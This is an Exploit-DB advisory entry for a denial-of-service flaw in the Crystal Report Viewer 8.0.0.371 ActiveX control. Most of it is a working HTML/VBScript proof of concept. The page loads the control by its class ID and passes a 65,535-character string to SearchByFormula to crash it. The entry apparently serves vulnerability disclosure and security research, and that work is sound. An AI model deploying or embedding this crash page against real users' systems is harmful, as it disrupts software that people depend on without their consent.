Crystal Report Viewer 8.0.0.371 - ActiveX Denial of Service Vulnerability

2010-11-03T00:00:00
ID EDB-ID:15408
Type exploitdb
Reporter Matthew Bergin
Modified 2010-11-03T00:00:00

Description

Crystal Report Viewer v8.0.0.371 ActiveX Denial of Service Vulnerability. Dos exploit for windows platform

                                        
                                            <html>
Crystal Reporting Viewer v8.0.0.371
Author: Matthew Bergin
Website: www.berginpentesting.com
Website: www.smashthestack.org
<object classid='clsid:C4847596-972C-11D0-9567-00A0C9273C2A' id='target' ></object>
<script language='vbscript'>

targetFile = "C:\WINDOWS\system32\crviewer.dll"
prototype  = "Sub SearchByFormula ( ByVal formula As String )"
memberName = "SearchByFormula"
progid     = "CRVIEWERLib.CRViewer"
argCount   = 1

arg1=String(65535, "A")

target.SearchByFormula arg1 

</script>